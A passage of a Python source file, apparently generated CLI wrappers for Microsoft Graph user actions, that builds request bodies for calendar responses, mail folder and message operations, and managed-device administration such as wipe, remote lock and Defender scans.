    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, event_id=event_id, body=payload)
def usersactions_usersevent_decline(
        client, user_id, event_id, comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, event_id=event_id, body=payload)
def usersactions_usersevent_dismiss_reminder(client, user_id, event_id):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'event_id': event_id}
    return client.dismiss_reminder(**route)
def usersactions_usersevent_snooze_reminder(
        client, user_id, event_id, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, event_id=event_id, body=payload)
def usersactions_usersevent_tentatively_accept(
        client, user_id, event_id, comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, event_id=event_id,
                                     body=payload)
def usersactions_usersmailfolderschildfolder_copy(
        client, user_id, mail_folder_id, mail_folder_id1, destination_id=None):
    """Build the optional ``destination_id`` body and call ``client.copy``."""
    payload = {} if destination_id is None else {'destination_id': destination_id}
    return client.copy(user_id=user_id, mail_folder_id=mail_folder_id,
                       mail_folder_id1=mail_folder_id1, body=payload)
def usersactions_usersmailfolderschildfolder_move(client, user_id, mail_folder_id,
                                                  mail_folder_id1, destination_id=None):
    """Move a child mail folder to the destination folder."""
    payload = {} if destination_id is None else {'destination_id': destination_id}
    return client.move(user_id=user_id, mail_folder_id=mail_folder_id,
                       mail_folder_id1=mail_folder_id1, body=payload)
def usersactions_usersmailfoldersmessagesattachment_create_upload_session(
        client, user_id, mail_folder_id, message_id, attachment_item=None):
    """Create an upload session for a large attachment on a folder message."""
    payload = {} if attachment_item is None else {'attachment_item': attachment_item}
    return client.create_upload_session(user_id=user_id, mail_folder_id=mail_folder_id,
                                        message_id=message_id, body=payload)
def usersactions_usersmailfoldersmessage_copy(client, user_id, mail_folder_id,
                                              message_id, destination_id=None):
    """Copy a message from a mail folder to the destination folder."""
    payload = {} if destination_id is None else {'destination_id': destination_id}
    return client.copy(user_id=user_id, mail_folder_id=mail_folder_id,
                       message_id=message_id, body=payload)
def usersactions_usersmailfoldersmessage_create_forward(
        client, user_id, mail_folder_id, message_id, body,
        to_recipients=None, comment=None, id_=None, categories=None,
        change_key=None, created_date_time=None, last_modified_date_time=None,
        bcc_recipients=None, body_preview=None, cc_recipients=None,
        conversation_id=None, conversation_index=None, flag=None,
        from_=None, has_attachments=None, importance=None,
        inference_classification=None, internet_message_headers=None,
        internet_message_id=None, is_delivery_receipt_requested=None,
        is_draft=None, is_read=None, is_read_receipt_requested=None,
        parent_folder_id=None, received_date_time=None, reply_to=None,
        sender=None, sent_date_time=None, subject=None,
        microsoft_graph_message_to_recipients=None, unique_body=None,
        web_link=None, attachments=None, extensions=None,
        multi_value_extended_properties=None,
        single_value_extended_properties=None):
    """Create a draft forward of a message in a user's mail folder.

    :param body: the itemBody of the draft message (required).
    :param to_recipients: top-level forward recipients.
    :param microsoft_graph_message_to_recipients: message.to_recipients.
    :param from_: message sender (serialized as ``from_property``).

    Fixes over the generated original:
    - the parameter was literally named ``from`` — a Python keyword, so the
      module could not even be parsed; it is renamed ``from_``.
    - the request dict was also named ``body``, shadowing the required
      message-body parameter, so ``message['body']`` was set to the request
      dict itself (a self-reference) and the caller's itemBody was lost.
    """
    payload = {}
    if to_recipients is not None:
        payload['to_recipients'] = to_recipients
    if comment is not None:
        payload['comment'] = comment
    # body is required, so the message dict is never empty; the original's
    # "delete message if empty" cleanup is therefore unnecessary.
    message = {'body': body}
    for key, value in (
            ('id', id_),
            ('categories', categories),
            ('change_key', change_key),
            ('created_date_time', created_date_time),
            ('last_modified_date_time', last_modified_date_time),
            ('bcc_recipients', bcc_recipients),
            ('body_preview', body_preview),
            ('cc_recipients', cc_recipients),
            ('conversation_id', conversation_id),
            ('conversation_index', conversation_index),
            ('flag', flag),
            ('from_property', from_),
            ('has_attachments', has_attachments),
            ('importance', importance),
            ('inference_classification', inference_classification),
            ('internet_message_headers', internet_message_headers),
            ('internet_message_id', internet_message_id),
            ('is_delivery_receipt_requested', is_delivery_receipt_requested),
            ('is_draft', is_draft),
            ('is_read', is_read),
            ('is_read_receipt_requested', is_read_receipt_requested),
            ('parent_folder_id', parent_folder_id),
            ('received_date_time', received_date_time),
            ('reply_to', reply_to),
            ('sender', sender),
            ('sent_date_time', sent_date_time),
            ('subject', subject),
            ('to_recipients', microsoft_graph_message_to_recipients),
            ('unique_body', unique_body),
            ('web_link', web_link),
            ('attachments', attachments),
            ('extensions', extensions),
            ('multi_value_extended_properties', multi_value_extended_properties),
            ('single_value_extended_properties', single_value_extended_properties)):
        if value is not None:
            message[key] = value
    payload['message'] = message
    return client.create_forward(user_id=user_id,
                                 mail_folder_id=mail_folder_id,
                                 message_id=message_id,
                                 body=payload)
def usersactions_usersmailfoldersmessage_create_reply(
        client, user_id, mail_folder_id, message_id, body,
        comment=None, id_=None, categories=None, change_key=None,
        created_date_time=None, last_modified_date_time=None,
        bcc_recipients=None, body_preview=None, cc_recipients=None,
        conversation_id=None, conversation_index=None, flag=None,
        from_=None, has_attachments=None, importance=None,
        inference_classification=None, internet_message_headers=None,
        internet_message_id=None, is_delivery_receipt_requested=None,
        is_draft=None, is_read=None, is_read_receipt_requested=None,
        parent_folder_id=None, received_date_time=None, reply_to=None,
        sender=None, sent_date_time=None, subject=None, to_recipients=None,
        unique_body=None, web_link=None, attachments=None, extensions=None,
        multi_value_extended_properties=None,
        single_value_extended_properties=None):
    """Create a draft reply to a message in a user's mail folder.

    :param body: the itemBody of the draft message (required).
    :param from_: message sender (serialized as ``from_property``).

    Fixes over the generated original:
    - the parameter was literally named ``from`` — a Python keyword, so the
      module could not even be parsed; it is renamed ``from_``.
    - the request dict was also named ``body``, shadowing the required
      message-body parameter, so ``message['body']`` was set to the request
      dict itself and the caller's itemBody was lost.
    """
    payload = {}
    if comment is not None:
        payload['comment'] = comment
    # body is required, so the message dict is never empty.
    message = {'body': body}
    for key, value in (
            ('id', id_),
            ('categories', categories),
            ('change_key', change_key),
            ('created_date_time', created_date_time),
            ('last_modified_date_time', last_modified_date_time),
            ('bcc_recipients', bcc_recipients),
            ('body_preview', body_preview),
            ('cc_recipients', cc_recipients),
            ('conversation_id', conversation_id),
            ('conversation_index', conversation_index),
            ('flag', flag),
            ('from_property', from_),
            ('has_attachments', has_attachments),
            ('importance', importance),
            ('inference_classification', inference_classification),
            ('internet_message_headers', internet_message_headers),
            ('internet_message_id', internet_message_id),
            ('is_delivery_receipt_requested', is_delivery_receipt_requested),
            ('is_draft', is_draft),
            ('is_read', is_read),
            ('is_read_receipt_requested', is_read_receipt_requested),
            ('parent_folder_id', parent_folder_id),
            ('received_date_time', received_date_time),
            ('reply_to', reply_to),
            ('sender', sender),
            ('sent_date_time', sent_date_time),
            ('subject', subject),
            ('to_recipients', to_recipients),
            ('unique_body', unique_body),
            ('web_link', web_link),
            ('attachments', attachments),
            ('extensions', extensions),
            ('multi_value_extended_properties', multi_value_extended_properties),
            ('single_value_extended_properties', single_value_extended_properties)):
        if value is not None:
            message[key] = value
    payload['message'] = message
    return client.create_reply(user_id=user_id,
                               mail_folder_id=mail_folder_id,
                               message_id=message_id,
                               body=payload)
def usersactions_usersmailfoldersmessage_create_reply_all(
        client, user_id, mail_folder_id, message_id, body,
        comment=None, id_=None, categories=None, change_key=None,
        created_date_time=None, last_modified_date_time=None,
        bcc_recipients=None, body_preview=None, cc_recipients=None,
        conversation_id=None, conversation_index=None, flag=None,
        from_=None, has_attachments=None, importance=None,
        inference_classification=None, internet_message_headers=None,
        internet_message_id=None, is_delivery_receipt_requested=None,
        is_draft=None, is_read=None, is_read_receipt_requested=None,
        parent_folder_id=None, received_date_time=None, reply_to=None,
        sender=None, sent_date_time=None, subject=None, to_recipients=None,
        unique_body=None, web_link=None, attachments=None, extensions=None,
        multi_value_extended_properties=None,
        single_value_extended_properties=None):
    """Create a draft reply-all to a message in a user's mail folder.

    :param body: the itemBody of the draft message (required).
    :param from_: message sender (serialized as ``from_property``).

    Fixes over the generated original:
    - the parameter was literally named ``from`` — a Python keyword, so the
      module could not even be parsed; it is renamed ``from_``.
    - the request dict was also named ``body``, shadowing the required
      message-body parameter, so ``message['body']`` was set to the request
      dict itself and the caller's itemBody was lost.
    """
    payload = {}
    if comment is not None:
        payload['comment'] = comment
    # body is required, so the message dict is never empty.
    message = {'body': body}
    for key, value in (
            ('id', id_),
            ('categories', categories),
            ('change_key', change_key),
            ('created_date_time', created_date_time),
            ('last_modified_date_time', last_modified_date_time),
            ('bcc_recipients', bcc_recipients),
            ('body_preview', body_preview),
            ('cc_recipients', cc_recipients),
            ('conversation_id', conversation_id),
            ('conversation_index', conversation_index),
            ('flag', flag),
            ('from_property', from_),
            ('has_attachments', has_attachments),
            ('importance', importance),
            ('inference_classification', inference_classification),
            ('internet_message_headers', internet_message_headers),
            ('internet_message_id', internet_message_id),
            ('is_delivery_receipt_requested', is_delivery_receipt_requested),
            ('is_draft', is_draft),
            ('is_read', is_read),
            ('is_read_receipt_requested', is_read_receipt_requested),
            ('parent_folder_id', parent_folder_id),
            ('received_date_time', received_date_time),
            ('reply_to', reply_to),
            ('sender', sender),
            ('sent_date_time', sent_date_time),
            ('subject', subject),
            ('to_recipients', to_recipients),
            ('unique_body', unique_body),
            ('web_link', web_link),
            ('attachments', attachments),
            ('extensions', extensions),
            ('multi_value_extended_properties', multi_value_extended_properties),
            ('single_value_extended_properties', single_value_extended_properties)):
        if value is not None:
            message[key] = value
    payload['message'] = message
    return client.create_reply_all(user_id=user_id,
                                   mail_folder_id=mail_folder_id,
                                   message_id=message_id,
                                   body=payload)
def usersactions_usersmailfoldersmessage_forward(
        client, user_id, mail_folder_id, message_id, body,
        to_recipients=None, comment=None, id_=None, categories=None,
        change_key=None, created_date_time=None, last_modified_date_time=None,
        bcc_recipients=None, body_preview=None, cc_recipients=None,
        conversation_id=None, conversation_index=None, flag=None,
        from_=None, has_attachments=None, importance=None,
        inference_classification=None, internet_message_headers=None,
        internet_message_id=None, is_delivery_receipt_requested=None,
        is_draft=None, is_read=None, is_read_receipt_requested=None,
        parent_folder_id=None, received_date_time=None, reply_to=None,
        sender=None, sent_date_time=None, subject=None,
        microsoft_graph_message_to_recipients=None, unique_body=None,
        web_link=None, attachments=None, extensions=None,
        multi_value_extended_properties=None,
        single_value_extended_properties=None):
    """Forward a message from a user's mail folder.

    :param body: the itemBody of the outgoing message (required).
    :param to_recipients: top-level forward recipients.
    :param microsoft_graph_message_to_recipients: message.to_recipients.
    :param from_: message sender (serialized as ``from_property``).

    Fixes over the generated original:
    - the parameter was literally named ``from`` — a Python keyword, so the
      module could not even be parsed; it is renamed ``from_``.
    - the request dict was also named ``body``, shadowing the required
      message-body parameter, so ``message['body']`` was set to the request
      dict itself and the caller's itemBody was lost.
    """
    payload = {}
    if to_recipients is not None:
        payload['to_recipients'] = to_recipients
    if comment is not None:
        payload['comment'] = comment
    # body is required, so the message dict is never empty.
    message = {'body': body}
    for key, value in (
            ('id', id_),
            ('categories', categories),
            ('change_key', change_key),
            ('created_date_time', created_date_time),
            ('last_modified_date_time', last_modified_date_time),
            ('bcc_recipients', bcc_recipients),
            ('body_preview', body_preview),
            ('cc_recipients', cc_recipients),
            ('conversation_id', conversation_id),
            ('conversation_index', conversation_index),
            ('flag', flag),
            ('from_property', from_),
            ('has_attachments', has_attachments),
            ('importance', importance),
            ('inference_classification', inference_classification),
            ('internet_message_headers', internet_message_headers),
            ('internet_message_id', internet_message_id),
            ('is_delivery_receipt_requested', is_delivery_receipt_requested),
            ('is_draft', is_draft),
            ('is_read', is_read),
            ('is_read_receipt_requested', is_read_receipt_requested),
            ('parent_folder_id', parent_folder_id),
            ('received_date_time', received_date_time),
            ('reply_to', reply_to),
            ('sender', sender),
            ('sent_date_time', sent_date_time),
            ('subject', subject),
            ('to_recipients', microsoft_graph_message_to_recipients),
            ('unique_body', unique_body),
            ('web_link', web_link),
            ('attachments', attachments),
            ('extensions', extensions),
            ('multi_value_extended_properties', multi_value_extended_properties),
            ('single_value_extended_properties', single_value_extended_properties)):
        if value is not None:
            message[key] = value
    payload['message'] = message
    return client.forward(user_id=user_id,
                          mail_folder_id=mail_folder_id,
                          message_id=message_id,
                          body=payload)
def usersactions_usersmailfoldersmessage_move(client, user_id, mail_folder_id,
                                              message_id, destination_id=None):
    """Move a message from a mail folder to the destination folder."""
    payload = {} if destination_id is None else {'destination_id': destination_id}
    return client.move(user_id=user_id, mail_folder_id=mail_folder_id,
                       message_id=message_id, body=payload)
def usersactions_usersmailfoldersmessage_reply(
        client, user_id, mail_folder_id, message_id, body,
        comment=None, id_=None, categories=None, change_key=None,
        created_date_time=None, last_modified_date_time=None,
        bcc_recipients=None, body_preview=None, cc_recipients=None,
        conversation_id=None, conversation_index=None, flag=None,
        from_=None, has_attachments=None, importance=None,
        inference_classification=None, internet_message_headers=None,
        internet_message_id=None, is_delivery_receipt_requested=None,
        is_draft=None, is_read=None, is_read_receipt_requested=None,
        parent_folder_id=None, received_date_time=None, reply_to=None,
        sender=None, sent_date_time=None, subject=None, to_recipients=None,
        unique_body=None, web_link=None, attachments=None, extensions=None,
        multi_value_extended_properties=None,
        single_value_extended_properties=None):
    """Reply to a message in a user's mail folder.

    :param body: the itemBody of the reply message (required).
    :param from_: message sender (serialized as ``from_property``).

    Fixes over the generated original:
    - the parameter was literally named ``from`` — a Python keyword, so the
      module could not even be parsed; it is renamed ``from_``.
    - the request dict was also named ``body``, shadowing the required
      message-body parameter, so ``message['body']`` was set to the request
      dict itself and the caller's itemBody was lost.
    """
    payload = {}
    if comment is not None:
        payload['comment'] = comment
    # body is required, so the message dict is never empty.
    message = {'body': body}
    for key, value in (
            ('id', id_),
            ('categories', categories),
            ('change_key', change_key),
            ('created_date_time', created_date_time),
            ('last_modified_date_time', last_modified_date_time),
            ('bcc_recipients', bcc_recipients),
            ('body_preview', body_preview),
            ('cc_recipients', cc_recipients),
            ('conversation_id', conversation_id),
            ('conversation_index', conversation_index),
            ('flag', flag),
            ('from_property', from_),
            ('has_attachments', has_attachments),
            ('importance', importance),
            ('inference_classification', inference_classification),
            ('internet_message_headers', internet_message_headers),
            ('internet_message_id', internet_message_id),
            ('is_delivery_receipt_requested', is_delivery_receipt_requested),
            ('is_draft', is_draft),
            ('is_read', is_read),
            ('is_read_receipt_requested', is_read_receipt_requested),
            ('parent_folder_id', parent_folder_id),
            ('received_date_time', received_date_time),
            ('reply_to', reply_to),
            ('sender', sender),
            ('sent_date_time', sent_date_time),
            ('subject', subject),
            ('to_recipients', to_recipients),
            ('unique_body', unique_body),
            ('web_link', web_link),
            ('attachments', attachments),
            ('extensions', extensions),
            ('multi_value_extended_properties', multi_value_extended_properties),
            ('single_value_extended_properties', single_value_extended_properties)):
        if value is not None:
            message[key] = value
    payload['message'] = message
    return client.reply(user_id=user_id,
                        mail_folder_id=mail_folder_id,
                        message_id=message_id,
                        body=payload)
def usersactions_usersmailfoldersmessage_reply_all(
        client, user_id, mail_folder_id, message_id, body,
        comment=None, id_=None, categories=None, change_key=None,
        created_date_time=None, last_modified_date_time=None,
        bcc_recipients=None, body_preview=None, cc_recipients=None,
        conversation_id=None, conversation_index=None, flag=None,
        from_=None, has_attachments=None, importance=None,
        inference_classification=None, internet_message_headers=None,
        internet_message_id=None, is_delivery_receipt_requested=None,
        is_draft=None, is_read=None, is_read_receipt_requested=None,
        parent_folder_id=None, received_date_time=None, reply_to=None,
        sender=None, sent_date_time=None, subject=None, to_recipients=None,
        unique_body=None, web_link=None, attachments=None, extensions=None,
        multi_value_extended_properties=None,
        single_value_extended_properties=None):
    """Reply to all recipients of a message in a user's mail folder.

    :param body: the itemBody of the reply message (required).
    :param from_: message sender (serialized as ``from_property``).

    Fixes over the generated original:
    - the parameter was literally named ``from`` — a Python keyword, so the
      module could not even be parsed; it is renamed ``from_``.
    - the request dict was also named ``body``, shadowing the required
      message-body parameter, so ``message['body']`` was set to the request
      dict itself and the caller's itemBody was lost.
    """
    payload = {}
    if comment is not None:
        payload['comment'] = comment
    # body is required, so the message dict is never empty.
    message = {'body': body}
    for key, value in (
            ('id', id_),
            ('categories', categories),
            ('change_key', change_key),
            ('created_date_time', created_date_time),
            ('last_modified_date_time', last_modified_date_time),
            ('bcc_recipients', bcc_recipients),
            ('body_preview', body_preview),
            ('cc_recipients', cc_recipients),
            ('conversation_id', conversation_id),
            ('conversation_index', conversation_index),
            ('flag', flag),
            ('from_property', from_),
            ('has_attachments', has_attachments),
            ('importance', importance),
            ('inference_classification', inference_classification),
            ('internet_message_headers', internet_message_headers),
            ('internet_message_id', internet_message_id),
            ('is_delivery_receipt_requested', is_delivery_receipt_requested),
            ('is_draft', is_draft),
            ('is_read', is_read),
            ('is_read_receipt_requested', is_read_receipt_requested),
            ('parent_folder_id', parent_folder_id),
            ('received_date_time', received_date_time),
            ('reply_to', reply_to),
            ('sender', sender),
            ('sent_date_time', sent_date_time),
            ('subject', subject),
            ('to_recipients', to_recipients),
            ('unique_body', unique_body),
            ('web_link', web_link),
            ('attachments', attachments),
            ('extensions', extensions),
            ('multi_value_extended_properties', multi_value_extended_properties),
            ('single_value_extended_properties', single_value_extended_properties)):
        if value is not None:
            message[key] = value
    payload['message'] = message
    return client.reply_all(user_id=user_id,
                            mail_folder_id=mail_folder_id,
                            message_id=message_id,
                            body=payload)
def usersactions_usersmailfoldersmessage_send(client, user_id, mail_folder_id, message_id):
    """Send the specified draft message from a user's mail folder."""
    return client.send(user_id=user_id, mail_folder_id=mail_folder_id,
                       message_id=message_id)
def usersactions_usersmailfolder_copy(client, user_id, mail_folder_id,
                                      destination_id=None):
    """Copy a mail folder and its contents to the destination folder."""
    payload = {} if destination_id is None else {'destination_id': destination_id}
    return client.copy(user_id=user_id, mail_folder_id=mail_folder_id, body=payload)
def usersactions_usersmailfolder_move(client, user_id, mail_folder_id,
                                      destination_id=None):
    """Move a mail folder and its contents to the destination folder."""
    payload = {} if destination_id is None else {'destination_id': destination_id}
    return client.move(user_id=user_id, mail_folder_id=mail_folder_id, body=payload)
def usersactions_usersmanageddevice_bypass_activation_lock(client, user_id, managed_device_id):
    """Bypass the activation lock on a user's managed device."""
    return client.bypass_activation_lock(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_clean_window_device(client, user_id,
                                                        managed_device_id,
                                                        keep_user_data=None):
    """Clean a Windows managed device; ``keep_user_data`` defaults to False."""
    payload = {'keep_user_data': keep_user_data if keep_user_data is not None else False}
    return client.clean_windows_device(user_id=user_id,
                                       managed_device_id=managed_device_id,
                                       body=payload)
def usersactions_usersmanageddevice_delete_user_from_shared_apple_device(
        client, user_id, managed_device_id, user_principal_name=None):
    """Delete a user (by UPN) from a shared Apple managed device."""
    payload = {} if user_principal_name is None else {'user_principal_name': user_principal_name}
    return client.delete_user_from_shared_apple_device(
        user_id=user_id, managed_device_id=managed_device_id, body=payload)
def usersactions_usersmanageddevice_disable_lost_mode(client, user_id, managed_device_id):
    """Disable lost mode on a user's managed device."""
    return client.disable_lost_mode(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_locate_device(client, user_id, managed_device_id):
    """Request the location of a user's managed device."""
    return client.locate_device(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_logout_shared_apple_device_active_user(client, user_id, managed_device_id):
    """Log out the active user on a shared Apple managed device."""
    return client.logout_shared_apple_device_active_user(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_reboot_now(client, user_id, managed_device_id):
    """Reboot a user's managed device immediately."""
    return client.reboot_now(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_recover_passcode(client, user_id, managed_device_id):
    """Recover the passcode of a user's managed device."""
    return client.recover_passcode(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_remote_lock(client, user_id, managed_device_id):
    """Remotely lock a user's managed device."""
    return client.remote_lock(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_request_remote_assistance(client, user_id, managed_device_id):
    """Request a remote-assistance session on a user's managed device."""
    return client.request_remote_assistance(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_reset_passcode(client, user_id, managed_device_id):
    """Reset the passcode of a user's managed device."""
    return client.reset_passcode(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_retire(client, user_id, managed_device_id):
    """Retire (unmanage) a user's managed device."""
    return client.retire(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_shut_down(client, user_id, managed_device_id):
    """Shut down a user's managed device."""
    return client.shut_down(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_sync_device(client, user_id, managed_device_id):
    """Trigger a policy/app sync on a user's managed device."""
    return client.sync_device(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_update_window_device_account(
        client, user_id, managed_device_id,
        calendar_sync_enabled=None, device_account_email=None,
        exchange_server=None, password_rotation_enabled=None,
        session_initiation_protocal_address=None, password=None):
    """Update the Windows device account on a user's managed device.

    Only parameters that were supplied end up in the action-parameter body;
    ``password`` is nested under ``device_account``.
    """
    params = {}
    for key, value in (('calendar_sync_enabled', calendar_sync_enabled),
                       ('device_account_email', device_account_email),
                       ('exchange_server', exchange_server),
                       ('password_rotation_enabled', password_rotation_enabled),
                       ('session_initiation_protocal_address', session_initiation_protocal_address)):
        if value is not None:
            params[key] = value
    if password is not None:
        params['device_account'] = {'password': password}
    return client.update_windows_device_account(
        user_id=user_id, managed_device_id=managed_device_id,
        body={'update_windows_device_account_action_parameter': params})
def usersactions_usersmanageddevice_window_defender_scan(client, user_id,
                                                         managed_device_id,
                                                         quick_scan=None):
    """Start a Windows Defender scan; ``quick_scan`` defaults to False."""
    payload = {'quick_scan': quick_scan if quick_scan is not None else False}
    return client.windows_defender_scan(user_id=user_id,
                                        managed_device_id=managed_device_id,
                                        body=payload)
def usersactions_usersmanageddevice_window_defender_update_signature(client, user_id, managed_device_id):
    """Update Windows Defender signatures on a user's managed device."""
    return client.windows_defender_update_signatures(user_id=user_id, managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_wipe(client, user_id, managed_device_id,
                                         keep_enrollment_data=None,
                                         keep_user_data=None,
                                         mac_os_unlock_code=None):
    """Wipe a user's managed device.

    ``keep_enrollment_data`` and ``keep_user_data`` default to False in the
    request; ``mac_os_unlock_code`` is only sent when supplied.
    """
    payload = {
        'keep_enrollment_data': keep_enrollment_data if keep_enrollment_data is not None else False,
        'keep_user_data': keep_user_data if keep_user_data is not None else False,
    }
    if mac_os_unlock_code is not None:
        payload['mac_os_unlock_code'] = mac_os_unlock_code
    return client.wipe(user_id=user_id, managed_device_id=managed_device_id,
                       body=payload)
def usersactions_usersmessagesattachment_create_upload_session(
        client, user_id, message_id, attachment_item=None):
    """Create an upload session for a large attachment on a user's message."""
    payload = {} if attachment_item is None else {'attachment_item': attachment_item}
    return client.create_upload_session(user_id=user_id, message_id=message_id,
                                        body=payload)
def usersactions_usersmessage_copy(client, user_id, message_id,
                                   destination_id=None):
    """Copy a user's message to the destination folder."""
    payload = {} if destination_id is None else {'destination_id': destination_id}
    return client.copy(user_id=user_id, message_id=message_id, body=payload)
def usersactions_usersmessage_create_forward(client,
                                             user_id,
                                             message_id,
                                             body,
                                             to_recipients=None,
                                             comment=None,
                                             id_=None,
                                             categories=None,
                                             change_key=None,
                                             created_date_time=None,
                                             last_modified_date_time=None,
                                             bcc_recipients=None,
                                             body_preview=None,
                                             cc_recipients=None,
                                             conversation_id=None,
                                             conversation_index=None,
                                             flag=None,
                                             from_=None,
                                             has_attachments=None,
                                             importance=None,
                                             inference_classification=None,
                                             internet_message_headers=None,
                                             internet_message_id=None,
                                             is_delivery_receipt_requested=None,
                                             is_draft=None,
                                             is_read=None,
                                             is_read_receipt_requested=None,
                                             parent_folder_id=None,
                                             received_date_time=None,
                                             reply_to=None,
                                             sender=None,
                                             sent_date_time=None,
                                             subject=None,
                                             microsoft_graph_message_to_recipients=None,
                                             unique_body=None,
                                             web_link=None,
                                             attachments=None,
                                             extensions=None,
                                             multi_value_extended_properties=None,
                                             single_value_extended_properties=None):
    """Create a draft forward of a message (Graph createForward action).

    ``body`` is the message-body resource placed at message.body; the
    remaining keyword arguments populate the wrapped 'message' resource and
    are omitted from the request when None. ``from_`` maps to the
    'from_property' field ('from' is a Python reserved word and cannot be a
    parameter name). ``microsoft_graph_message_to_recipients`` maps to the
    message-level 'to_recipients' field, distinct from the action-level
    ``to_recipients``.
    """
    payload = {}
    if to_recipients is not None:
        payload['to_recipients'] = to_recipients
    if comment is not None:
        payload['comment'] = comment
    # Build the payload under a distinct local name: the original code
    # shadowed the 'body' parameter with the payload dict and then assigned
    # the dict to itself (a circular reference), losing the caller's body.
    message = {'body': body}
    optional = (
        ('id', id_), ('categories', categories), ('change_key', change_key),
        ('created_date_time', created_date_time),
        ('last_modified_date_time', last_modified_date_time),
        ('bcc_recipients', bcc_recipients), ('body_preview', body_preview),
        ('cc_recipients', cc_recipients), ('conversation_id', conversation_id),
        ('conversation_index', conversation_index), ('flag', flag),
        ('from_property', from_), ('has_attachments', has_attachments),
        ('importance', importance),
        ('inference_classification', inference_classification),
        ('internet_message_headers', internet_message_headers),
        ('internet_message_id', internet_message_id),
        ('is_delivery_receipt_requested', is_delivery_receipt_requested),
        ('is_draft', is_draft), ('is_read', is_read),
        ('is_read_receipt_requested', is_read_receipt_requested),
        ('parent_folder_id', parent_folder_id),
        ('received_date_time', received_date_time), ('reply_to', reply_to),
        ('sender', sender), ('sent_date_time', sent_date_time),
        ('subject', subject),
        ('to_recipients', microsoft_graph_message_to_recipients),
        ('unique_body', unique_body), ('web_link', web_link),
        ('attachments', attachments), ('extensions', extensions),
        ('multi_value_extended_properties', multi_value_extended_properties),
        ('single_value_extended_properties', single_value_extended_properties),
    )
    for key, value in optional:
        if value is not None:
            message[key] = value
    # 'body' is always present, so the message dict is never empty; the
    # original "delete if empty" branch was dead code and is dropped.
    payload['message'] = message
    return client.create_forward(user_id=user_id,
                                 message_id=message_id,
                                 body=payload)
def usersactions_usersmessage_create_reply(client,
                                           user_id,
                                           message_id,
                                           body,
                                           comment=None,
                                           id_=None,
                                           categories=None,
                                           change_key=None,
                                           created_date_time=None,
                                           last_modified_date_time=None,
                                           bcc_recipients=None,
                                           body_preview=None,
                                           cc_recipients=None,
                                           conversation_id=None,
                                           conversation_index=None,
                                           flag=None,
                                           from_=None,
                                           has_attachments=None,
                                           importance=None,
                                           inference_classification=None,
                                           internet_message_headers=None,
                                           internet_message_id=None,
                                           is_delivery_receipt_requested=None,
                                           is_draft=None,
                                           is_read=None,
                                           is_read_receipt_requested=None,
                                           parent_folder_id=None,
                                           received_date_time=None,
                                           reply_to=None,
                                           sender=None,
                                           sent_date_time=None,
                                           subject=None,
                                           to_recipients=None,
                                           unique_body=None,
                                           web_link=None,
                                           attachments=None,
                                           extensions=None,
                                           multi_value_extended_properties=None,
                                           single_value_extended_properties=None):
    """Create a draft reply to a message (Graph createReply action).

    ``body`` is the message-body resource placed at message.body; the
    remaining keyword arguments populate the wrapped 'message' resource and
    are omitted from the request when None. ``from_`` maps to the
    'from_property' field ('from' is a Python reserved word and cannot be a
    parameter name).
    """
    payload = {}
    if comment is not None:
        payload['comment'] = comment
    # Build the payload under a distinct local name: the original code
    # shadowed the 'body' parameter with the payload dict and then assigned
    # the dict to itself (a circular reference), losing the caller's body.
    message = {'body': body}
    optional = (
        ('id', id_), ('categories', categories), ('change_key', change_key),
        ('created_date_time', created_date_time),
        ('last_modified_date_time', last_modified_date_time),
        ('bcc_recipients', bcc_recipients), ('body_preview', body_preview),
        ('cc_recipients', cc_recipients), ('conversation_id', conversation_id),
        ('conversation_index', conversation_index), ('flag', flag),
        ('from_property', from_), ('has_attachments', has_attachments),
        ('importance', importance),
        ('inference_classification', inference_classification),
        ('internet_message_headers', internet_message_headers),
        ('internet_message_id', internet_message_id),
        ('is_delivery_receipt_requested', is_delivery_receipt_requested),
        ('is_draft', is_draft), ('is_read', is_read),
        ('is_read_receipt_requested', is_read_receipt_requested),
        ('parent_folder_id', parent_folder_id),
        ('received_date_time', received_date_time), ('reply_to', reply_to),
        ('sender', sender), ('sent_date_time', sent_date_time),
        ('subject', subject), ('to_recipients', to_recipients),
        ('unique_body', unique_body), ('web_link', web_link),
        ('attachments', attachments), ('extensions', extensions),
        ('multi_value_extended_properties', multi_value_extended_properties),
        ('single_value_extended_properties', single_value_extended_properties),
    )
    for key, value in optional:
        if value is not None:
            message[key] = value
    # 'body' is always present, so the message dict is never empty; the
    # original "delete if empty" branch was dead code and is dropped.
    payload['message'] = message
    return client.create_reply(user_id=user_id,
                               message_id=message_id,
                               body=payload)
def usersactions_usersmessage_create_reply_all(client,
                                               user_id,
                                               message_id,
                                               body,
                                               comment=None,
                                               id_=None,
                                               categories=None,
                                               change_key=None,
                                               created_date_time=None,
                                               last_modified_date_time=None,
                                               bcc_recipients=None,
                                               body_preview=None,
                                               cc_recipients=None,
                                               conversation_id=None,
                                               conversation_index=None,
                                               flag=None,
                                               from_=None,
                                               has_attachments=None,
